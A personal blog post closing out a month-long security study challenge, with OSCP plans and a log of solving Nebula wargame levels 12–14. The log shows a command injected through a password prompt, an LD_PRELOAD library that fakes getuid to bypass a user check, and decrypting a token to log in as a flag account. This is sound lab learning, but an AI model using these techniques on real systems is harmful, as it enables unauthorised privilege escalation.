Security Challenge – Week 6

Phew, made it to the end! Technically, I covered more than October, since I had some bumper dates at the beginning and ending weeks, so that’s cool.

What did I learn from all this?

  1. This challenge was HARD. Managing to squeeze in even 30 minutes a day when my schedule tends to be pretty jam-packed was really difficult
  2. I remember more of the tools and their use than I had thought – go me!
  3. I need to work on my code analysis – need to do some research on how to improve that particular skill

On point number 3, I suspect it’s going to mean writing more code, which means learning more code. The challenges I was using for practice mainly used C and Python, so I’m thinking those might be the right way to go. I’ve dabbled in some Python before, but I have pretty much zero exposure to C.

I’m going to take November to consider if I want to take up another challenge, and maybe a different one at that. I’ve already submitted to the CFP for AtlSecCon, based on this challenge, so that’s on the agenda. Even if it doesn’t get accepted, I’ll probably build the presentation, and submit it to BSides St. John’s.

Without further ado, here’s my final week’s log:

Oct. 30: 30 minutes of reading “Network Security Assessment”

Oct. 31: It’s Halloween, I took the day off from the challenge.

Nov. 1: Started looking at the Offensive Security Certified Professional designation. A few years back, I had been considering pursuing my CISSP (and I still plan to), but that effort has very much been on the back-burner while I’ve been working towards a degree in Adult and Post-Secondary Education. The course and exam both sound very intense, but I think with some prep work I could manage it. It would likely require me to scale back my efforts on my degree, at least for a semester (I usually take 2 courses each semester). In my research, I came across what looks to be a good resource for prep – maybe that’s what my next challenge will be.

Nov. 2: Doing some further research on getting ready for course and OSCP. I came across someone who was trying to do what I’ve been doing – looking for vulnerable VMs to practice on. Found a few:

I also came across an interesting post on LinkedIn about someone’s experience in prepping for the exam.

Went through my emails, and found some eBooks I had bought on a Humble Bundle a while back. I figure this will make for some good reading, particularly the Python books. Started up a Trello board to keep track of what I want to read and/or do before I sign up for the course.

Decided to see if I could finish off at least another level or two of the Exploit-Exercises Nebula challenge before the end of the week. Had to go over my notes to remember where I had left off – starting up Level 12.

There is a backdoor process listening on port 50001.

There’s a bit of code here. From the variable initialization, it seems like it binds the localhost address to 50001. It’s owned by Root, and it looks like I don’t have write access. Oddly enough, I can’t run the script either. Something I heard in a podcast recently, was that a lot of people still leave Telnet running when they don’t need to. Maybe I can use that somehow?

telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 
Better luck next time
Connection closed by foreign host.

Hmm. There’s a string in the file, I wonder if someone hard-coded the password.

telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 4754a4f4bd5787accd33de887b9250a0691dd198
Better luck next time
Connection closed by foreign host.

Nope. After going over some of the previous challenges, I’m thinking maybe I can pass something in via the password field.

telnet 127.0.0.1 50001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Password: 1;/bin/getflag > /tmp/level12;echo 1
Better luck next time
Connection closed by foreign host.
level12@nebula:~$ cat /tmp/level12
You have successfully executed getflag on a target account

Bazinga! On to Level 13.

There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.

The script is expecting a variable of FAKEUID to be 1000, so I need a way to pass it a different UID than mine (it’s 1014, according to running the script initially).

usermod -u 1234 flag13
usermod: cannot lock /etc/passwd; try again later.

I decided to take a look online, and see how other solved this problem. The one that made the most sense to me was this one; while I likely wouldn’t have come up with this on my own, in large part because I can’t remember the last time I compiled C code (if ever).

vi getuid.c


#include<unistd.h>#include<unistd.h>uid_t getuid(void){ return 1000;}

gcc -fPIC -shared -o lib.so getuid.c
level13@nebula:~$ export LD_PRELOAD="/home/level13/lib.so"
level13@nebula:~$ ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58

To better understand why this worked, I did some digging on LD_PRELOAD. This seems like a handy tool! Out of curiousity, I decided to check in to what libraries the script was calling:

ldd flag13
 linux-gate.so.1 => (0x00d86000)
 /home/level13/lib.so (0x00fc5000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00237000)
 /lib/ld-linux.so.2 (0x001a1000)

Neat! Anyway, on to Level 14.

This program resides in /home/flag14/flag14. It encrypts input and writes it to standard output. An encrypted token file is also in that home directory, decrypt it 🙂

There’s no source code this time. If I run the script, I get

./flag14
 ./flag14
 -e Encrypt input

./flag14 -e
 abcdefg
 acegikm^C

It doesn’t generate anything on the fly. I also got one character not listed in my text; I think it’s a Unicode character.

Nov. 3: Came at it fresh today, realized the “encryption” is REALLY simple – each character is incremented by one, plus whatever the previous count was. So, abc gets incremented to a (0) c (0+1 from b), e (1+1 from c). Let’s see what the token file has in it:

cat token
857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.

Since I’m short on time, and frankly my Python skills are still very much a work in progress, I looked up how some other folks answered this. Based on my understanding of how this script works, it should work back the encryption, and present me with the token, which will give me access to Flag14.

level14@nebula:~$ python /home/level14/decrypt.py 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
Original: 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
Decrypted: 8457c118-887c-4e40-a5a6-33a25353165

level14@nebula:~$ ssh flag14@localhost

flag14@nebula:~$ getflag
You have successfully executed getflag on a target account

Nov. 4 & 5: 30 minutes of reading “Network Security Assessment” each day

Leave a Reply

Your email address will not be published. Required fields are marked *